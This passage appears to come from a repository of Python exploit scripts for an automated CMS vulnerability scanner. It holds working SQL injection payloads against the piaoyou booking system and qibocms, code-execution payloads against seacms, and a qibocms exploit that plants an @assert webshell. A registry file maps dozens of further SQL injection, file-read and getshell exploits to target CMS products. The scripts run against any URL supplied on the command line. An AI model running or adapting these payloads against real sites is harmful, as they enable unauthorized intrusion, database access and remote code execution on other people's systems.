27 | "/Visa/gjqz_add.aspx?id=214"]
28 | try:
29 | noexist = True
30 | for url in urls:
31 | vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
32 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
33 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
34 | cprint("[+]存在票友机票预订系统SQL注入漏洞(绕过)...(高危)\tpayload: "+vulnurl, "red")
35 | noexist = False
36 | if noexist:
37 | cprint("[-]不存在piaoyou_six2_sqli漏洞", "white", "on_grey")
38 |
39 | except:
40 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
41 |
42 | if __name__ == "__main__":
43 | warnings.filterwarnings("ignore")
44 | testVuln = piaoyou_six2_sqli_BaseVerify(sys.argv[1])
45 | testVuln.run()
46 |
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_six_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友机票预订系统6处SQL注入(绕过)
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0116851
6 | author: Lucifer
7 | description: multi sqli。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class piaoyou_six_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | urls = ["/flight/Print_tp.aspx?sid=1",
23 | "/flight/Print_tp_3.aspx?sid=1",
24 | "/Other/train_order_detail.aspx?id=1",
25 | "/flight/scgq_detail.aspx?id=1",
26 | "/Finance/Inv_req.aspx?id=1",
27 | "/System/history.aspx?id=1"]
28 | try:
29 | noexist = True
30 | for url in urls:
31 | vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
32 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
33 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
34 | cprint("[+]存在票友机票预订系统SQL注入漏洞(绕过)...(高危)\tpayload: "+vulnurl, "red")
35 | noexist = False
36 | if noexist:
37 | cprint("[-]不存在piaoyou_six_sqli漏洞", "white", "on_grey")
38 |
39 | except:
40 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
41 |
42 | if __name__ == "__main__":
43 | warnings.filterwarnings("ignore")
44 | testVuln = piaoyou_six_sqli_BaseVerify(sys.argv[1])
45 | testVuln.run()
46 |
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_ten_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友机票预订系统10处SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0118867
6 | author: Lucifer
7 | description: multi sqli。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class piaoyou_ten_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | urls = ["/Other/train_input.aspx?memberid=1",
23 | "/Other/hotel_input.aspx?memberid=1",
24 | "/Other/input.aspx?memberid=1",
25 | "/flight/Print_url_sel.aspx?id=2",
26 | "/flight/Xcd_selected.aspx?id=111",
27 | "/System/history.aspx?id=1",
28 | "/flight/scgq.aspx?id=1",
29 | "/Other/Edit.aspx?id=1",
30 | "/flight/Html.aspx?id=1",
31 | "/info/zclist_new.aspx?id=1"]
32 | try:
33 | noexist = True
34 | for url in urls:
35 | vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
36 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
37 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
38 | cprint("[+]存在票友机票预订系统10处SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
39 | noexist = False
40 | if noexist:
41 | cprint("[-]不存在piaoyou_ten_sqli漏洞", "white", "on_grey")
42 |
43 | except:
44 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
45 |
46 | if __name__ == "__main__":
47 | warnings.filterwarnings("ignore")
48 | testVuln = piaoyou_ten_sqli_BaseVerify(sys.argv[1])
49 | testVuln.run()
50 |
--------------------------------------------------------------------------------
/pocs/poc_db.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | from find_cms.cms_enum import *
3 | from pocs import *
4 |
5 |
6 | class poc_db:
7 | def __init__(self):
8 | self.data = {
9 | Cms_Enum.dedecms: {
10 | "dedecms版本探测": "dedecms_version_BaseVerify(self.cms_mode.url).run()",
11 | "dedecms download.php重定向漏洞": "dedecms_download_redirect_BaseVerify(self.cms_mode.url).run()",
12 | "dedecms trace爆路径漏洞": "dedecms_error_trace_disclosure_BaseVerify(self.cms_mode.url).run()",
13 | "dedecms recommend.php SQL注入": "dedecms_recommend_sqli_BaseVerify(self.cms_mode.url).run()",
14 | "dedecms search.php SQL注入漏洞": "dedecms_search_typeArr_sqli_BaseVerify(self.cms_mode.url).run()",
15 | },
16 | Cms_Enum.phpcms: {
17 | "phpcms authkey泄露": "phpcms_authkey_disclosure_BaseVerify(self.cms_mode.url).run()",
18 | "phpcms digg_add.php SQL注入": "phpcms_digg_add_sqli_BaseVerify(self.cms_mode.url).run()",
19 | "phpcms2008 flash_upload.php SQL注入": "phpcms_flash_upload_sqli_BaseVerify(self.cms_mode.url).run()",
20 | "phpcms2008 product.php 代码执行": "phpcms_product_code_exec_BaseVerify(self.cms_mode.url).run()",
21 | "phpcms v9 flash xss漏洞": "phpcms_v9_flash_xss_BaseVerify(self.cms_mode.url).run()",
22 | "phpcms v9.6.0 SQL注入": "phpcms_v96_sqli_BaseVerify(self.cms_mode.url).run()",
23 | "phpcms 9.6.1任意文件读取漏洞": "phpcms_v961_fileread_BaseVerify(self.cms_mode.url).run()"
24 | },
25 | Cms_Enum.seacms: {
26 | "seacms 6.45 search.php order参数前台代码执行": "seacms_order_code_exec_BaseVerify(self.cms_mode.url).run()",
27 | "seacms search.php 代码执行": "seacms_search_code_exec_BaseVerify(self.cms_mode.url).run()",
28 | "seacms search.php 参数jq代码执行": "seacms_search_jq_code_exec_BaseVerify(self.cms_mode.url).run()"
29 | },
30 | Cms_Enum.discuz: {
31 | "discuz X3 focus.swf flashxss漏洞": "discuz_focus_flashxss_BaseVerify(self.cms_mode.url).run()",
32 | "discuz论坛forum.php参数message SSRF漏洞": "discuz_forum_message_ssrf_BaseVerify(self.cms_mode.url).run()",
33 | "discuz问卷调查参数orderby注入漏洞": "discuz_plugin_ques_sqli_BaseVerify(self.cms_mode.url).run()",
34 | "discuz! X2.5 物理路径泄露漏洞": "discuz_x25_path_disclosure_BaseVerify(self.cms_mode.url).run()"
35 | },
36 | Cms_Enum.acsoft: {
37 | "安财软件GetFile任意文件读取": "acsoft_GetFile_fileread_BaseVerify(self.cms_mode.url).run()",
38 | "安财软件GetFileContent任意文件读取": "acsoft_GetFileContent_fileread_BaseVerify(self.cms_mode.url).run()",
39 | "安财软件GetXMLList任意文件读取": "acsoft_GetXMLList_fileread_BaseVerify(self.cms_mode.url).run()"
40 | },
41 | Cms_Enum.cmseasy: {
42 | "cmseasy header.php 报错注入": "cmseasy_header_detail_sqli_BaseVerify(self.cms_mode.url).run()"
43 |
44 | },
45 | Cms_Enum.dreamgallery: {
46 | "dreamgallery album.php SQL注入": "dreamgallery_album_id_sqli_BaseVerify(self.cms_mode.url).run()"
47 | },
48 | Cms_Enum.ecshop: {
49 | "ecshop3.0 flow.php 参数order_id注入": "ecshop_flow_orderid_sqli_BaseVerify(self.cms_mode.url).run()",
50 | "ecshop uc.php参数code SQL注入": "ecshop_uc_code_sqli_BaseVerify(self.cms_mode.url).run()"
51 | },
52 | Cms_Enum.eyou: {
53 | "亿邮Email Defender系统免登陆DBA注入": "eyou_admin_id_sqli_BaseVerify(self.cms_mode.url).run()",
54 | "亿邮邮件系统重置密码问题暴力破解": "eyou_resetpw_BaseVerify(self.cms_mode.url).run()",
55 | "亿邮mail5 user 参数kw SQL注入": "eyou_user_kw_sqli_BaseVerify(self.cms_mode.url).run()",
56 | "亿邮邮箱弱口令列表泄露": "eyou_weakpass_BaseVerify(self.cms_mode.url).run()"
57 | },
58 | Cms_Enum.fastmeeting: {
59 | "好视通视频会议系统(fastmeeting)任意文件遍历": "fastmeeting_download_filedownload_BaseVerify(self.cms_mode.url).run()"
60 | },
61 | Cms_Enum.finecms: {
62 | "FineCMS免费版文件上传漏洞": "finecms_uploadfile_BaseVerify(self.cms_mode.url).run()"
63 |
64 | },
65 | Cms_Enum.FoosunCms: {
66 | "Dotnetcms(风讯cms)SQL注入漏洞": "foosun_City_ajax_sqli_BaseVerify(self.cms_mode.url).run()"
67 |
68 | },
69 | Cms_Enum.fsmcms: {
70 | "FSMCMS columninfo.jsp文件参数ColumnID SQL注入": "fsmcms_columninfo_sqli_BaseVerify(self.cms_mode.url).run()",
71 | "fsmcms p_replydetail.jsp注入漏洞": "fsmcms_p_replydetail_sqli_BaseVerify(self.cms_mode.url).run()",
72 | "FSMCMS网站重装漏洞": "fsmcms_setup_reinstall_BaseVerify(self.cms_mode.url).run()"
73 | },
74 | Cms_Enum.gowinsoft_jw: {
75 | "金窗教务系统存在多处SQL注射漏洞": "gowinsoft_jw_multi_sqli_BaseVerify(self.cms_mode.url).run()"
76 | },
77 | Cms_Enum.hanweb: {
78 | "大汉downfile.jsp 任意文件下载": "hanweb_downfile_filedownload_BaseVerify(self.cms_mode.url).run()",
79 | "大汉版通JCMS数据库配置文件读取漏洞": "hanweb_readxml_fileread_BaseVerify(self.cms_mode.url).run()",
80 | "大汉VerfiyCodeServlet越权漏洞": "hanweb_VerifyCodeServlet_install_BaseVerify(self.cms_mode.url).run()"
81 | },
82 | Cms_Enum.joomla: {
83 | "joomla组件com_docman本地文件包含": "joomla_com_docman_lfi_BaseVerify(self.cms_mode.url).run()",
84 | "joomla 3.7.0 core SQL注入": "joomla_index_list_sqli_BaseVerify(self.cms_mode.url).run()"
85 | },
86 | Cms_Enum.kxmail: {
87 | "科信邮件系统login.server.php 时间盲注": "kxmail_login_server_sqli_BaseVerify(self.cms_mode.url).run()"
88 | },
89 | Cms_Enum.libsys: {
90 | "汇文软件图书管理系统ajax_asyn_link.php任意文件读取": "libsys_ajax_asyn_link_fileread_BaseVerify(self.cms_mode.url).run()",
91 | "汇文软件图书管理系统ajax_asyn_link.old.php任意文件读取": "libsys_ajax_asyn_link_old_fileread_BaseVerify(self.cms_mode.url).run()",
92 | "汇文软件图书管理系统ajax_get_file.php任意文件读取": "libsys_ajax_get_file_fileread_BaseVerify(self.cms_mode.url).run()"
93 | },
94 | Cms_Enum.metinfo: {
95 | "metinfo5.0 getpassword.php两处时间盲注漏洞": "metinfo_getpassword_sqli_BaseVerify(self.cms_mode.url).run()",
96 | "metinfo v5.3sql注入漏洞": "metinfo_login_check_sqli_BaseVerify(self.cms_mode.url).run()"
97 | },
98 | Cms_Enum.pageadmin: {
99 | "PageAdmin可“伪造”VIEWSTATE执行任意SQL查询&重置管理员密码": "pageadmin_forge_viewstate_BaseVerify(self.cms_mode.url).run()"
100 | },
101 | Cms_Enum.phpok: {
102 | "phpok api.php SQL注入漏洞": "phpok_api_param_sqli_BaseVerify(self.cms_mode.url).run()",
103 | "phpok remote_image getshell漏洞": "phpok_remote_image_getshell_BaseVerify(self.cms_mode.url).run()",
104 | "phpok res_action_control.php 任意文件下载(需要cookies文件)": "phpok_res_action_control_filedownload_BaseVerify(self.cms_mode.url).run()"
105 | },
106 | Cms_Enum.piaoyou: {
107 | "票友票务系统int_order.aspx SQL注入": "piaoyou_int_order_sqli_BaseVerify(self.cms_mode.url).run()",
108 | "票友机票预订系统6处SQL注入": "piaoyou_multi_sqli_BaseVerify(self.cms_mode.url).run()",
109 | "票友票务系统通用sql注入": "piaoyou_newsview_list_BaseVerify(self.cms_mode.url).run()",
110 | "票友机票预订系统6处SQL注入2(绕过)": "piaoyou_six2_sqli_BaseVerify(self.cms_mode.url).run()",
111 | "票友机票预订系统6处SQL注入(绕过)": "piaoyou_six_sqli_BaseVerify(self.cms_mode.url).run()",
112 | "票友机票预订系统10处SQL注入": "piaoyou_ten_sqli_BaseVerify(self.cms_mode.url).run()"
113 | },
114 | Cms_Enum.qibocms: {
115 | "qibocms news/js.php文件参数f_idSQL注入": "qibocms_js_f_id_sqli_BaseVerify(self.cms_mode.url).run()",
116 | "qibocms s.php文件参数fids SQL注入": "qibocms_s_fids_sqli_BaseVerify(self.cms_mode.url).run()",
117 | "qibo分类系统search.php 代码执行": "qibocms_search_code_exec_BaseVerify(self.cms_mode.url).run()",
118 | "qibocms知道系统SQL注入": "qibocms_search_sqli_BaseVerify(self.cms_mode.url).run()"
119 | },
120 | Cms_Enum.shopex: {
121 | "shopex敏感信息泄露": "shopex_phpinfo_disclosure_BaseVerify(self.cms_mode.url).run()"
122 | },
123 | Cms_Enum.shopnc: {
124 | "shopNC B2B版 index.php SQL注入": "shopnc_index_class_id_sqli_BaseVerify(self.cms_mode.url).run()"
125 | },
126 | Cms_Enum.siteengine: {
127 | "SiteEngine 6.0 & 7.1 SQL注入漏洞": "siteengine_comments_module_sqli_BaseVerify(self.cms_mode.url).run()"
128 | },
129 | Cms_Enum.siteserver: {
130 | "siteserver3.6.4 background_administrator.aspx注入": "siteserver_background_administrator_sqli_BaseVerify(self.cms_mode.url).run()",
131 | "siteserver3.6.4 background_keywordsFilting.aspx注入": "siteserver_background_keywordsFilting_sqli_BaseVerify(self.cms_mode.url).run()",
132 | "siteserver3.6.4 background_log.aspx注入": "siteserver_background_log_sqli_BaseVerify(self.cms_mode.url).run()",
133 | "siteserver3.6.4 background_taskLog.aspx注入": "siteserver_background_taskLog_sqli_BaseVerify(self.cms_mode.url).run()",
134 | "siteserver3.6.4 user.aspx注入": "siteserver_UserNameCollection_sqli_BaseVerify(self.cms_mode.url).run()"
135 | },
136 | Cms_Enum.thinkphp: {
137 | "Onethink 参数category SQL注入": "onethink_category_sqli_BaseVerify(self.cms_mode.url).run()",
138 | "ThinkPHP 代码执行漏洞": "thinkphp_code_exec_BaseVerify(self.cms_mode.url).run()",
139 | "ThinkPHP V5代码执行漏洞": "thinkphp_v5_exec_BaseVerify(self.cms_mode.url).run()"
140 | },
141 | Cms_Enum.thinksns: {
142 | "thinksns category模块代码执行": "thinksns_category_code_exec_BaseVerify(self.cms_mode.url).run()"
143 | },
144 | Cms_Enum.typecho: {
145 | "typecho install.php反序列化命令执行": "typecho_install_code_exec_BaseVerify(self.cms_mode.url).run()"
146 | },
147 | Cms_Enum.umail: {
148 | "umail物理路径泄露": "umail_physical_path_BaseVerify(self.cms_mode.url).run()",
149 | "umail_physical_path_BaseVerify": "umail_sessionid_access_BaseVerify(self.cms_mode.url).run()"
150 | },
151 | Cms_Enum.urp: {
152 | "urp查询接口曝露": "urp_query_BaseVerify(self.cms_mode.url).run()",
153 | "URP越权查看任意学生课表、成绩(需登录)": "urp_query2_BaseVerify(self.cms_mode.url).run()",
154 | "URP综合教务系统任意文件读取": "urp_ReadJavaScriptServlet_fileread_BaseVerify(self.cms_mode.url).run()"
155 | },
156 | Cms_Enum.weaver_oa: {
157 | "泛微OA 数据库配置泄露": "weaver_oa_db_disclosure_BaseVerify(self.cms_mode.url).run()",
158 | "泛微OA filedownaction SQL注入": "weaver_oa_download_sqli_BaseVerify(self.cms_mode.url).run()",
159 | "泛微OA downfile.php 任意文件下载漏洞": "weaver_oa_filedownload_BaseVerify(self.cms_mode.url).run()"
160 | },
161 | Cms_Enum.wecenter: {
162 | "wecenter SQL注入": "wecenter_topic_id_sqli_BaseVerify(self.cms_mode.url).run()"
163 | },
164 | Cms_Enum.wordpress: {
165 | "wordpress admin-ajax.php任意文件下载": "wordpress_admin_ajax_filedownload_BaseVerify(self.cms_mode.url).run()",
166 | "wordpress display-widgets插件后门漏洞": "wordpress_display_widgets_backdoor_BaseVerify(self.cms_mode.url).run()",
167 | "Wordpress AzonPop插件SQL注入": "wordpress_plugin_azonpop_sqli_BaseVerify(self.cms_mode.url).run()",
168 | "wordpress 插件mailpress远程代码执行": "wordpress_plugin_mailpress_rce_BaseVerify(self.cms_mode.url).run()",
169 | "wordpress 插件shortcode0.2.3 本地文件包含": "wordpress_plugin_ShortCode_lfi_BaseVerify(self.cms_mode.url).run()",
170 | "wordpress rest api权限失效导致内容注入": "wordpress_restapi_sqli_BaseVerify(self.cms_mode.url).run()",
171 | "wordpress插件跳转": "wordpress_url_redirect_BaseVerify(self.cms_mode.url).run()",
172 | "wordpress 插件WooCommerce PHP代码注入": "wordpress_woocommerce_code_exec_BaseVerify(self.cms_mode.url).run()"
173 | },
174 | Cms_Enum.xplus: {
175 | "xplus npmaker 2003系统GETSHELL": "xplus_2003_getshell_BaseVerify(self.cms_mode.url).run()",
176 | "xplus通用注入": "xplus_mysql_mssql_sqli_BaseVerify(self.cms_mode.url).run()"
177 | },
178 | Cms_Enum.zfsoft: {
179 | "正方教务系统数据库任意操纵": "zfsoft_database_control_BaseVerify(self.cms_mode.url).run()",
180 | "正方教务系统default3.aspx爆破页面": "zfsoft_default3_bruteforce_BaseVerify(self.cms_mode.url).run()",
181 | "正方教务系统services.asmx SQL注入": "zfsoft_service_stryhm_sqli_BaseVerify(self.cms_mode.url).run()"
182 | },
183 | Cms_Enum.zuitu: {
184 | "最土团购SQL注入": "zuitu_coupon_id_sqli_BaseVerify(self.cms_mode.url).run()"
185 | }
186 |
187 | }
188 |
--------------------------------------------------------------------------------
/pocs/qibocms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/qibocms/__init__.py
--------------------------------------------------------------------------------
/pocs/qibocms/qibocms_js_f_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: qibocms news/js.php文件参数f_idSQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-075317
6 | author: Lucifer
7 | description: 文件/news/js.php中,参数f_id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class qibocms_js_f_id_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/news/js.php?f_id=1)%20UnIoN%20SeLeCt%201,Md5(1234),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23&type=hot"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在qibocms news/js.php文件参数f_idSQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在qibocms_js_f_id_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = qibocms_js_f_id_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/qibocms/qibocms_s_fids_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: qibocms s.php文件参数fids SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 文件/coupon/s.php中,参数fids存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class qibocms_s_fids_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/coupon/s.php?action=search&keyword=11&fid=1&fids[]=0)%20UnIoN%20SeLeCt%20Md5(1234),2,3,4,5,6,7,8,9%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在qibocms s.php文件参数fids SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在qibocms_s_fids_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = qibocms_s_fids_sqli_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/qibocms/qibocms_search_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: qibo分类系统search.php 代码执行
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0122599
6 | author: Lucifer
7 | description: search.php代码执行。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class qibocms_search_code_exec_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/new/fenlei/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=../../admin/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${@assert($_POST[vuln])}"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | vulnurl = self.url + "/do/jf.php"
28 | post_data = {
29 | "vuln":"phpinfo();"
30 | }
31 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
32 | if r"Configuration File (php.ini) Path" in req.text:
33 | cprint("[+]存在qibo分类系统search.php 代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
34 | else:
35 | cprint("[-]不存在qibocms_search_code_exec漏洞", "white", "on_grey")
36 |
37 | except:
38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
40 | if __name__ == "__main__":
41 | warnings.filterwarnings("ignore")
42 | testVuln = qibocms_search_code_exec_BaseVerify(sys.argv[1])
43 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/qibocms/qibocms_search_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: qibocms知道系统SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0115138
6 | author: Lucifer
7 | description: 文件/zhidao/zhidao/search.php中,参数fulltext存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class qibocms_search_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/zhidao/zhidao/search.php?&tags=ll%20ll%20ll&keyword=111&fulltext[]=11)%20AnD%201=2%20UnIoN%20SeLeCt%201%20FrOm%20(SeLeCt%20CoUnT(*),CoNcAt(FlOoR(RaNd(0)*2),Md5(1234))a%20FrOm%20InFoRmAtIoN_ScHeMa.TaBlEs%20GrOuP%20By%20a)b%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在qibocms知道系统注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在qibocms_search_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = qibocms_search_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/seacms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/seacms/__init__.py
--------------------------------------------------------------------------------
/pocs/seacms/seacms_order_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: seacms 6.45 search.php order参数前台代码执行
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件/search.php中,post参数order存在代码执行漏洞。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class seacms_order_code_exec_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/search.php?searchtype=5"
24 | post_data = {
25 | "searchword":"d",
26 | "order":"}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}",
27 | "func":"glob",
28 | "cmd":"comment.php"
29 | }
30 | vulnurl = self.url + payload
31 | try:
32 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
33 | if r"comment.php" in req.text:
34 | cprint("[+]存在seacms 6.45 search.php order参数前台代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
35 | else:
36 | cprint("[-]不存在seacms_order_code_exec漏洞", "white", "on_grey")
37 |
38 | except:
39 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
40 |
41 | if __name__ == "__main__":
42 | warnings.filterwarnings("ignore")
43 | testVuln = seacms_order_code_exec_BaseVerify(sys.argv[1])
44 | testVuln.run()
45 |
--------------------------------------------------------------------------------
/pocs/seacms/seacms_search_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: seacms search.php 代码执行
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件search.php中,参数area存在代码执行。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class seacms_search_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/search.php?searchtype=5&tid=&area=phpinfo()"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Configuration File (php.ini) Path" in req.text:
27 | cprint("[+]存在seacms search.php代码注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在seacms_search_code_exec漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = seacms_search_code_exec_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/seacms/seacms_search_jq_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: seacms search.php 参数jq代码执行
5 | referer: http://www.freebuf.com/vuls/150042.html
6 | author: Lucifer
7 | description: 文件search.php中,传入参数经过拼接造成代码执行。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class seacms_search_jq_code_exec_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
22 | "Content-Type":"application/x-www-form-urlencoded",
23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
24 | }
25 | vulnurl = self.url + "/search.php"
